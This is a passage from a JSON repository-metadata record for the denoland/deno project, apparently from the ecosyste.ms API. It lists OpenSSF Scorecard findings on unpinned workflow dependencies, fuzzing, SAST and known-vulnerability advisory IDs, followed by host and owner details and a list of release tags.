https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/G